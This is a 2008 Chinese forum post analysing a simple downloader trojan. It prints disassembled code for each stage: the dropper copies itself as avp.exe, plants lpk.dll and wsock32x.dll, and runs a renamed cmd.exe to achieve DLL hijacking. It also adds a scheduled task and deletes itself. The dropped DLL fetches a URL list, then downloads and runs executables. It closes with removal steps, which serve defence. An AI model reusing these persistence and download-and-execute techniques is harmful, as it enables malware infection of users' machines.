好友
阅读权限255
听众
最后登录1970-1-1
|
zzage
发表于 2008-12-1 17:09
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【文章标题】分析一个简单的DLL劫持下载者
【文章作者】ZzAge[LCG]
【文章目标】某个下载者
【相关工具】IDA,OllyDbg
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2008年12月01日
一 创建互斥体
CODE:00404844 push ebx
CODE:00404845 push offset Name ; lpName //'exe'
CODE:0040484A push 0FFFFFFFFh ; int
CODE:0040484C push 0 ; lpMutexAttributes
CODE:0040484E call sub_403EC4 //互斥体的构建函数
CODE:00404853 call GetLastError_0
CODE:00404858 cmp eax, 0B7h
CODE:0040485D jnz short loc_404861
CODE:0040485F mov bl, 1
CODE:00404861
CODE:00404861 loc_404861: ; CODE XREF: sub_404844+19j
CODE:00404861 mov eax, ebx
CODE:00404863 pop ebx
CODE:00404864 retn
二 取Windows目录
CODE:004041DB push 100h ; uSize
CODE:004041E0 push ebx ; lpBuffer
CODE:004041E1 call GetWindowsDirectoryA
三 删除计划任务C:\WINDOWS\Tasks\At1.job文件
CODE:004041FD mov edx, offset dword_404530 //'\tasks\at1.job'
CODE:00404202 call sub_403760
CODE:00404207 mov eax, [ebp+var_4]
CODE:0040420A call sub_403840
CODE:0040420F push eax ; lpFileName
CODE:00404210 call DeleteFileA
四 把Windows目录下的wsock32x.dll,lpk.dll,avp.exe的文件属性设置为正常,并且删除其文件,然后把木马自身复制到Windows目录下,新命名为avp.exe。
CODE:0040422C mov edx, offset dword_404548//'\wsock32x.dll'
CODE:00404231 call sub_403760
CODE:00404236 mov eax, [ebp+var_8]
CODE:00404239 call sub_403840
CODE:0040423E push eax ; lpFileName
CODE:0040423F call SetFileAttributesA
CODE:00404244 push 80h ; dwFileAttributes
CODE:00404249 lea eax, [ebp+var_C]
CODE:0040424C mov edx, ebx
CODE:0040424E mov ecx, 101h
CODE:00404253 call sub_403740
CODE:00404258 lea eax, [ebp+var_C]
CODE:0040425B mov edx, offset dword_404560 //'\lpk.dll'
CODE:00404260 call sub_403760
CODE:00404265 mov eax, [ebp+var_C]
CODE:00404268 call sub_403840
CODE:0040426D push eax ; lpFileName
CODE:0040426E call SetFileAttributesA
CODE:00404273 push 80h ; dwFileAttributes
CODE:00404278 lea eax, [ebp+var_10]
CODE:0040427B mov edx, ebx
CODE:0040427D mov ecx, 101h
CODE:00404282 call sub_403740
CODE:00404287 lea eax, [ebp+var_10]
CODE:0040428A mov edx, offset dword_404574 //'\avp.exe'
CODE:0040428F call sub_403760
CODE:00404294 mov eax, [ebp+var_10]
CODE:00404297 call sub_403840
CODE:0040429C push eax ; lpFileName
CODE:0040429D call SetFileAttributesA
CODE:004042A2 lea eax, [ebp+var_14]
CODE:004042A5 mov edx, ebx
CODE:004042A7 mov ecx, 101h
CODE:004042AC call sub_403740
CODE:004042B1 lea eax, [ebp+var_14]
CODE:004042B4 mov edx, offset dword_404548 //'\wsock32x.dll'
CODE:004042B9 call sub_403760
CODE:004042BE mov eax, [ebp+var_14]
CODE:004042C1 call sub_403840
CODE:004042C6 push eax ; lpFileName
CODE:004042C7 call DeleteFileA
CODE:004042CC lea eax, [ebp+var_18]
CODE:004042CF mov edx, ebx
CODE:004042D1 mov ecx, 101h
CODE:004042D6 call sub_403740
CODE:004042DB lea eax, [ebp+var_18]
CODE:004042DE mov edx, offset dword_404560 //'\lpk.dll'
CODE:004042E3 call sub_403760
CODE:004042E8 mov eax, [ebp+var_18]
CODE:004042EB call sub_403840
CODE:004042F0 push eax ; lpFileName
CODE:004042F1 call DeleteFileA
CODE:004042F6 lea eax, [ebp+var_1C]
CODE:004042F9 mov edx, ebx
CODE:004042FB mov ecx, 101h
CODE:00404300 call sub_403740
CODE:00404305 lea eax, [ebp+var_1C]
CODE:00404308 mov edx, offset dword_404574 //'\avp.exe'
CODE:0040430D call sub_403760
CODE:00404312 mov eax, [ebp+var_1C]
CODE:00404315 call sub_403840
CODE:0040431A push eax ; lpFileName
CODE:0040431B call DeleteFileA
CODE:00404320 push 0 ; bFailIfExists
CODE:00404322 lea eax, [ebp+var_20]
CODE:00404325 mov edx, ebx
CODE:00404327 mov ecx, 101h
CODE:0040432C call sub_403740
CODE:00404331 lea eax, [ebp+var_20]
CODE:00404334 mov edx, offset dword_404574 //'\avp.exe'
CODE:00404339 call sub_403760
CODE:0040433E mov eax, [ebp+var_20]
CODE:00404341 call sub_403840
CODE:00404346 push eax ; lpNewFileName
CODE:00404347 lea edx, [ebp+var_24]
CODE:0040434A xor eax, eax
CODE:0040434C call sub_4026F0
CODE:00404351 mov eax, [ebp+var_24]
CODE:00404354 call sub_403840
CODE:00404359 push eax ; lpExistingFileName
CODE:0040435A call CopyFileA
五 释放lpk.dll和wsock32x.dll到Windows目录下
CODE:00404371 mov edx, offset dword_404560;"\lpk.dll"
CODE:00404376 call sub_403760
CODE:0040437B mov ecx, [ebp+var_28]
CODE:0040437E mov edx, offset dword_404588;"LPK"
CODE:00404383 mov eax, offset aExefile ; "exefile"
CODE:00404388 call sub_4040A8 //资源释放过程
CODE:0040438D lea eax, [ebp+var_2C]
CODE:00404390 mov edx, ebx
CODE:00404392 mov ecx, 101h
CODE:00404397 call sub_403740
CODE:0040439C lea eax, [ebp+var_2C]
CODE:0040439F mov edx, offset dword_404548;"wsock32x.dll"
CODE:004043A4 call sub_403760
CODE:004043A9 mov ecx, [ebp+var_2C]
CODE:004043AC mov edx, offset aWsock32x ; "wsock32x"
CODE:004043B1 mov eax, offset aExefile ; "exefile"
CODE:004043B6 call sub_4040A8 //资源释放过程
六 把system32目录下的CMD,复制到Windows目录下,并命名为svchost.exe,然后对svchost.exe,avp.exe,wsock32x.dll,lpk.dll的文件属性设置为只读,隐藏,系统,然后运行svchost.exe
CODE:004043BB push 0 ; bFailIfExists
CODE:004043BD lea eax, [ebp+var_30]
CODE:004043C0 mov edx, ebx
CODE:004043C2 mov ecx, 101h
CODE:004043C7 call sub_403740
CODE:004043CC lea eax, [ebp+var_30]
CODE:004043CF mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:004043D4 call sub_403760
CODE:004043D9 mov eax, [ebp+var_30]
CODE:004043DC call sub_403840
CODE:004043E1 push eax ; lpNewFileName
CODE:004043E2 lea eax, [ebp+var_34]
CODE:004043E5 mov edx, ebx
CODE:004043E7 mov ecx, 101h
CODE:004043EC call sub_403740
CODE:004043F1 lea eax, [ebp+var_34]
CODE:004043F4 mov edx, offset aSystem32Cmd_ex ; "\\system32\\cmd.exe"
CODE:004043F9 call sub_403760
CODE:004043FE mov eax, [ebp+var_34]
CODE:00404401 call sub_403840
CODE:00404406 push eax ; lpExistingFileName
CODE:00404407 call CopyFileA
CODE:0040440C push 23h ; dwFileAttributes
CODE:0040440E lea eax, [ebp+var_38]
CODE:00404411 mov edx, ebx
CODE:00404413 mov ecx, 101h
CODE:00404418 call sub_403740
CODE:0040441D lea eax, [ebp+var_38]
CODE:00404420 mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:00404425 call sub_403760
CODE:0040442A mov eax, [ebp+var_38]
CODE:0040442D call sub_403840
CODE:00404432 push eax ; lpFileName
CODE:00404433 call SetFileAttributesA
CODE:00404438 push 23h ; dwFileAttributes
CODE:0040443A lea eax, [ebp+var_3C]
CODE:0040443D mov edx, ebx
CODE:0040443F mov ecx, 101h
CODE:00404444 call sub_403740
CODE:00404449 lea eax, [ebp+var_3C]
CODE:0040444C mov edx, offset dword_404574;"\avp.exe"
CODE:00404451 call sub_403760
CODE:00404456 mov eax, [ebp+var_3C]
CODE:00404459 call sub_403840
CODE:0040445E push eax ; lpFileName
CODE:0040445F call SetFileAttributesA
CODE:00404464 push 23h ; dwFileAttributes
CODE:00404466 lea eax, [ebp+var_40]
CODE:00404469 mov edx, ebx
CODE:0040446B mov ecx, 101h
CODE:00404470 call sub_403740
CODE:00404475 lea eax, [ebp+var_40]
CODE:00404478 mov edx, offset dword_404548;"\wsock32x.dll"
CODE:0040447D call sub_403760
CODE:00404482 mov eax, [ebp+var_40]
CODE:00404485 call sub_403840
CODE:0040448A push eax ; lpFileName
CODE:0040448B call SetFileAttributesA
CODE:00404490 push 23h ; dwFileAttributes
CODE:00404492 lea eax, [ebp+var_44]
CODE:00404495 mov edx, ebx
CODE:00404497 mov ecx, 101h
CODE:0040449C call sub_403740
CODE:004044A1 lea eax, [ebp+var_44]
CODE:004044A4 mov edx, offset dword_404560;"\lpk.dll"
CODE:004044A9 call sub_403760
CODE:004044AE mov eax, [ebp+var_44]
CODE:004044B1 call sub_403840
CODE:004044B6 push eax ; lpFileName
CODE:004044B7 call SetFileAttributesA
CODE:004044BC push 0 ; uCmdShow
CODE:004044BE lea eax, [ebp+var_48]
CODE:004044C1 mov edx, ebx
CODE:004044C3 mov ecx, 101h
CODE:004044C8 call sub_403740
CODE:004044CD lea eax, [ebp+var_48]
CODE:004044D0 mov edx, offset dword_4045B8;"\svchost.exe"
CODE:004044D5 call sub_403760
CODE:004044DA mov eax, [ebp+var_48]
CODE:004044DD call sub_403840
CODE:004044E2 push eax ; lpCmdLine
CODE:004044E3 call WinExec
七 为avp.exe木马文件添加一个计划任务,达到指定时间运行木马的目的
CODE:00403F84 push ebp
CODE:00403F85 mov ebp, esp
CODE:00403F87 add esp, 0FFFFFEF0h
CODE:00403F8D push ebx
CODE:00403F8E push esi
CODE:00403F8F xor eax, eax
CODE:00403F91 mov [ebp+var_110], eax
CODE:00403F97 mov [ebp+var_8], eax
CODE:00403F9A xor eax, eax
CODE:00403F9C push ebp
CODE:00403F9D push offset loc_404048
CODE:00403FA2 push dword ptr fs:[eax]
CODE:00403FA5 mov fs:[eax], esp
CODE:00403FA8 push 100h ; uSize
CODE:00403FAD lea eax, [ebp+Buffer]
CODE:00403FB3 push eax ; lpBuffer
CODE:00403FB4 call GetWindowsDirectoryA
CODE:00403FB9 lea eax, [ebp+var_8]
CODE:00403FBC lea edx, [ebp+Buffer]
CODE:00403FC2 mov ecx, 101h
CODE:00403FC7 call sub_4039D0
CODE:00403FCC mov eax, 10h
CODE:00403FD1 call sub_4024A0
CODE:00403FD6 mov esi, eax
CODE:00403FD8 mov eax, 4
CODE:00403FDD call sub_4024A0
CODE:00403FE2 mov [ebp+JobId], eax
CODE:00403FE5 mov dword ptr [esi], 9
CODE:00403FEB xor eax, eax
CODE:00403FED mov [esi+4], eax
CODE:00403FF0 mov byte ptr [esi+8], 0
CODE:00403FF4 lea eax, [ebp+var_110]
CODE:00403FFA mov ecx, offset aAvp_exe ; "\\avp.exe"
CODE:00403FFF mov edx, [ebp+var_8]
CODE:00404002 call sub_403A04
CODE:00404007 mov eax, [ebp+var_110]
CODE:0040400D call sub_4039E8
CODE:00404012 mov [esi+0Ch], eax
CODE:00404015 mov byte ptr [esi+9], 1
CODE:00404019 lea eax, [ebp+JobId]
CODE:0040401C push eax ; JobId
CODE:0040401D push esi ; Buffer
CODE:0040401E push 0 ; Servername
CODE:00404020 call NetScheduleJobAdd
CODE:00404025 test eax, eax
CODE:00404027 xor eax, eax
CODE:00404029 pop edx
CODE:0040402A pop ecx
CODE:0040402B pop ecx
CODE:0040402C mov fs:[eax], edx
CODE:0040402F push offset loc_40404F
CODE:00404034
CODE:00404034 loc_404034: ; CODE XREF: sub_403F84+C9j
CODE:00404034 lea eax, [ebp+var_110]
CODE:0040403A call sub_403908
CODE:0040403F lea eax, [ebp+var_8]
CODE:00404042 call sub_403908
CODE:00404047 retn
八创建一个批处理,然后调用CreateProcessA运行批处理,删除自身!整个木马的EXE的流程就这样,比较简单~
CODE:004045E4 push ebp
CODE:004045E5 mov ebp, esp
CODE:004045E7 add esp, 0FFFFFDCCh
CODE:004045ED xor edx, edx
CODE:004045EF mov [ebp+var_230], edx
CODE:004045F5 mov [ebp+var_234], edx
CODE:004045FB mov [ebp+var_228], edx
CODE:00404601 mov [ebp+var_22C], edx
CODE:00404607 mov [ebp+var_4], edx
CODE:0040460A xor eax, eax
CODE:0040460C push ebp
CODE:0040460D push offset loc_4047BD
CODE:00404612 push dword ptr fs:[eax]
CODE:00404615 mov fs:[eax], esp
CODE:00404618 nop
CODE:00404619 nop
CODE:0040461A nop
CODE:0040461B nop
CODE:0040461C nop
CODE:0040461D push eax
CODE:0040461E pop eax
CODE:0040461F nop
CODE:00404620 lea eax, [ebp+var_4]
CODE:00404623 mov edx, offset aCDeleteme_bat ; "c:\\Deleteme.bat"
CODE:00404628 call sub_40369C
CODE:0040462D mov edx, [ebp+var_4]
CODE:00404630 lea eax, [ebp+var_1D0]
CODE:00404636 call sub_402A0C
CODE:0040463B lea eax, [ebp+var_1D0]
CODE:00404641 call sub_4027A8
CODE:00404646 call sub_402594
CODE:0040464B mov edx, offset dword_4047E8
CODE:00404650 lea eax, [ebp+var_1D0]
CODE:00404656 call sub_4038B0
CODE:0040465B call sub_402D28
CODE:00404660 call sub_402594
CODE:00404665 push offset dword_4047F8
CODE:0040466A lea edx, [ebp+var_22C]
CODE:00404670 xor eax, eax
CODE:00404672 call sub_4026F0
CODE:00404677 push [ebp+var_22C]
CODE:0040467D push offset dword_404808
CODE:00404682 lea eax, [ebp+var_228]
CODE:00404688 mov edx, 3
CODE:0040468D call sub_4037A4
CODE:00404692 mov edx, [ebp+var_228]
CODE:00404698 lea eax, [ebp+var_1D0]
CODE:0040469E call sub_4038B0
CODE:004046A3 call sub_402D28
CODE:004046A8 call sub_402594
CODE:004046AD push offset dword_404814
CODE:004046B2 lea edx, [ebp+var_234]
CODE:004046B8 xor eax, eax
CODE:004046BA call sub_4026F0
CODE:004046BF push [ebp+var_234]
CODE:004046C5 push offset dword_404808
CODE:004046CA push offset dword_404828
CODE:004046CF lea eax, [ebp+var_230]
CODE:004046D5 mov edx, 4
CODE:004046DA call sub_4037A4
CODE:004046DF mov edx, [ebp+var_230]
CODE:004046E5 lea eax, [ebp+var_1D0]
CODE:004046EB call sub_4038B0
CODE:004046F0 call sub_402D28
CODE:004046F5 call sub_402594
CODE:004046FA mov edx, offset dword_40483C
CODE:004046FF lea eax, [ebp+var_1D0]
CODE:00404705 call sub_4038B0
CODE:0040470A call sub_402D28
CODE:0040470F call sub_402594
CODE:00404714 lea eax, [ebp+var_1D0]
CODE:0040471A call sub_402AC8
CODE:0040471F call sub_402594
CODE:00404724 lea eax, [ebp+StartupInfo]
CODE:0040472A xor ecx, ecx
CODE:0040472C mov edx, 44h
CODE:00404731 call sub_402B20
CODE:00404736 mov [ebp+StartupInfo.dwFlags], 1
CODE:00404740 mov [ebp+StartupInfo.wShowWindow], 0
CODE:00404749 lea eax, [ebp+ProcessInformation]
CODE:0040474F push eax ; lpProcessInformation
CODE:00404750 lea eax, [ebp+StartupInfo]
CODE:00404756 push eax ; lpStartupInfo
CODE:00404757 push 0 ; lpCurrentDirectory
CODE:00404759 push 0 ; lpEnvironment
CODE:0040475B push 40h ; dwCreationFlags
CODE:0040475D push 0 ; bInheritHandles
CODE:0040475F push 0 ; lpThreadAttributes
CODE:00404761 push 0 ; lpProcessAttributes
CODE:00404763 mov eax, [ebp+var_4]
CODE:00404766 call sub_403840
CODE:0040476B push eax ; lpCommandLine
CODE:0040476C push 0 ; lpApplicationName
CODE:0040476E call CreateProcessA
CODE:00404773 test eax, eax
CODE:00404775 jz short loc_40478F
CODE:00404777 mov eax, [ebp+ProcessInformation.hThread]
CODE:0040477D push eax ; hObject
CODE:0040477E call CloseHandle_0
CODE:00404783 mov eax, [ebp+ProcessInformation.hProcess]
CODE:00404789 push eax ; hObject
CODE:0040478A call CloseHandle_0
CODE:0040478F
CODE:0040478F loc_40478F: ; CODE XREF: sub_4045E4+191j
CODE:0040478F nop
CODE:00404790 nop
CODE:00404791 nop
CODE:00404792 nop
CODE:00404793 nop
CODE:00404794 push eax
CODE:00404795 pop eax
CODE:00404796 nop
CODE:00404797 xor eax, eax
CODE:00404799 pop edx
CODE:0040479A pop ecx
CODE:0040479B pop ecx
CODE:0040479C mov fs:[eax], edx
CODE:0040479F push offset loc_4047C4
CODE:004047A4
CODE:004047A4 loc_4047A4: ; CODE XREF: sub_4045E4+1DEj
CODE:004047A4 lea eax, [ebp+var_234]
CODE:004047AA mov edx, 4
CODE:004047AF call sub_403628
CODE:004047B4 lea eax, [ebp+var_4]
CODE:004047B7 call sub_403604
CODE:004047BC retn
LPK.dll的程序流程
一 创建线程
.data:10001253 push esi
.data:10001254 jnz short loc_10001294
.data:10001256 push 0 ; lpThreadId
.data:10001258 push 0 ; dwCreationFlags
.data:1000125A push 0 ; lpParameter
.data:1000125C push offset StartAddress ; lpStartAddress
.data:10001261 push 0 ; dwStackSize
.data:10001263 push 0 ; lpThreadAttributes
.data:10001265 call CreateThread
.data:1000126B push [esp+4+hLibModule] ; hLibModule
.data:1000126F call DisableThreadLibraryCalls
二 加载wsock32x.dll
.data:1000123D push offset LibFileName ; "wsock32x.dll"
.data:10001242 call LoadLibraryA
.data:10001248 push 1
.data:1000124A pop eax
.data:1000124B retn 4
wsock32x.dll的程序流程
一 下载过程
003E841E . 55 push ebp
003E841F . 68 45863E00 push 003E8645
003E8424 . 64:FF30 push dword ptr fs:[eax]
003E8427 . 64:8920 mov dword ptr fs:[eax], esp
003E842A . 68 54863E00 push 003E8654 ; /urlmon.dll
003E842F . E8 C8C7FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
003E8434 . 6A 00 push 0
003E8436 . 6A 00 push 0
003E8438 . 8D95 24FEFFFF lea edx, dword ptr [ebp-1DC]
003E843E . B8 01000000 mov eax, 1
003E8443 . E8 60FFFFFF call 003E83A8 ; 取临时文件夹路径
003E8448 . 8D85 24FEFFFF lea eax, dword ptr [ebp-1DC]
003E844E . BA 68863E00 mov edx, 003E8668 ; gk_drf.txt
003E8453 . E8 38BAFFFF call 003E3E90
003E8458 . 8B85 24FEFFFF mov eax, dword ptr [ebp-1DC]
003E845E . E8 FDBAFFFF call 003E3F60
003E8463 . 50 push eax
003E8464 . A1 A8923E00 mov eax, dword ptr [3E92A8]
003E8469 . 50 push eax
003E846A 6A 00 push 0
003E846C E8 EBFEFFFF call <jmp.&URLMON.URLDownloadToFileA> ; 把远程服务器的txt文件下载到临时文件夹
003E8471 . 6A FF push -1 ; /Alertable = TRUE
003E8473 . 68 C8000000 push 0C8 ; |Timeout = 200. ms
003E8478 . E8 87C7FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx
003E847D . 33C0 xor eax, eax
003E847F . 55 push ebp
003E8480 . 68 10863E00 push 003E8610
003E8485 . 64:FF30 push dword ptr fs:[eax]
003E8488 . 64:8920 mov dword ptr fs:[eax], esp
003E848B . 8D95 20FEFFFF lea edx, dword ptr [ebp-1E0]
003E8491 . B8 01000000 mov eax, 1
003E8496 . E8 0DFFFFFF call 003E83A8 ; 取临时文件夹路径
003E849B . 8D85 20FEFFFF lea eax, dword ptr [ebp-1E0]
003E84A1 . BA 68863E00 mov edx, 003E8668 ; gk_drf.txt
003E84A6 . E8 E5B9FFFF call 003E3E90
003E84AB . 8B95 20FEFFFF mov edx, dword ptr [ebp-1E0]
003E84B1 . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84B7 . E8 BCA4FFFF call 003E2978 ; 开始读取下载后的txt文件里面的下载地址
003E84BC . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84C2 . E8 4DA2FFFF call 003E2714
003E84C7 . E8 60A1FFFF call 003E262C
003E84CC . 33C0 xor eax, eax
003E84CE . 8945 FC mov dword ptr [ebp-4], eax
003E84D1 . E9 08010000 jmp 003E85DE
003E84D6 > FF45 FC inc dword ptr [ebp-4]
003E84D9 . 8D55 F4 lea edx, dword ptr [ebp-C]
003E84DC . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84E2 . E8 31A7FFFF call 003E2C18
003E84E7 . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84ED . E8 92A7FFFF call 003E2C84
003E84F2 . E8 35A1FFFF call 003E262C
003E84F7 . 8D45 F8 lea eax, dword ptr [ebp-8]
003E84FA . 8B55 F4 mov edx, dword ptr [ebp-C]
003E84FD . E8 9EB7FFFF call 003E3CA0
003E8502 . 33C0 xor eax, eax
003E8504 . 55 push ebp
003E8505 . 68 D4853E00 push 003E85D4
003E850A . 64:FF30 push dword ptr fs:[eax]
003E850D . 64:8920 mov dword ptr fs:[eax], esp
003E8510 . 6A 00 push 0
003E8512 . 6A 00 push 0
003E8514 . 8D95 18FEFFFF lea edx, dword ptr [ebp-1E8]
003E851A . B8 01000000 mov eax, 1
003E851F . E8 84FEFFFF call 003E83A8 ; 取临时文件夹路径
003E8524 . FFB5 18FEFFFF push dword ptr [ebp-1E8]
003E852A . 8D95 14FEFFFF lea edx, dword ptr [ebp-1EC]
003E8530 . 8B45 FC mov eax, dword ptr [ebp-4]
003E8533 . E8 68D4FFFF call 003E59A0
003E8538 . FFB5 14FEFFFF push dword ptr [ebp-1EC]
003E853E . 68 7C863E00 push 003E867C ; .exe
003E8543 . 8D85 1CFEFFFF lea eax, dword ptr [ebp-1E4]
003E8549 . BA 03000000 mov edx, 3
003E854E . E8 81B9FFFF call 003E3ED4
003E8553 . 8B85 1CFEFFFF mov eax, dword ptr [ebp-1E4]
003E8559 . E8 02BAFFFF call 003E3F60
003E855E . 50 push eax
003E855F . 8B45 F8 mov eax, dword ptr [ebp-8]
003E8562 . E8 F9B9FFFF call 003E3F60
003E8567 . 50 push eax
003E8568 . 6A 00 push 0
003E856A . E8 EDFDFFFF call <jmp.&URLMON.URLDownloadToFileA> ; 开始下载木马
003E856F . 6A FF push -1 ; /Alertable = TRUE
003E8571 . 6A 64 push 64 ; |Timeout = 100. ms
003E8573 . E8 8CC6FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx
003E8578 . 6A 00 push 0
003E857A . 8D95 0CFEFFFF lea edx, dword ptr [ebp-1F4]
003E8580 . B8 01000000 mov eax, 1
003E8585 . E8 1EFEFFFF call 003E83A8
003E858A . FFB5 0CFEFFFF push dword ptr [ebp-1F4]
003E8590 . 8D95 08FEFFFF lea edx, dword ptr [ebp-1F8]
003E8596 . 8B45 FC mov eax, dword ptr [ebp-4]
003E8599 . E8 02D4FFFF call 003E59A0
003E859E . FFB5 08FEFFFF push dword ptr [ebp-1F8]
003E85A4 . 68 7C863E00 push 003E867C ; .exe
003E85A9 . 8D85 10FEFFFF lea eax, dword ptr [ebp-1F0]
003E85AF . BA 03000000 mov edx, 3
003E85B4 . E8 1BB9FFFF call 003E3ED4
003E85B9 . 8B85 10FEFFFF mov eax, dword ptr [ebp-1F0]
003E85BF . E8 9CB9FFFF call 003E3F60 ; 运行下载后的木马
003E85C4 . 50 push eax ; |CmdLine
003E85C5 . E8 4AC6FFFF call <jmp.&kernel32.WinExec> ; \WinExec
这个下载者主要就是运行改名伪装的的cmd.exe,然后利用lpk.dll这特殊的DLL进行劫持,加载wsock32x.dll这个具有下载功能的DLL
详细的DLL劫持解说,大家可以去看海风大牛的《神奇的马甲Dll 》,贴子地址:http://www.unpack.cn/viewthread.php?tid=26167
清除的方法:删除计划任务,Windows目录下的wsock32x.dll,lpk.dll,avp.exe 即可...
只是一个简单的下载者分析,不要扔砖头啊....
-------------From:ZzAge[LCG] {www.52pojie.cn}------------------- |
|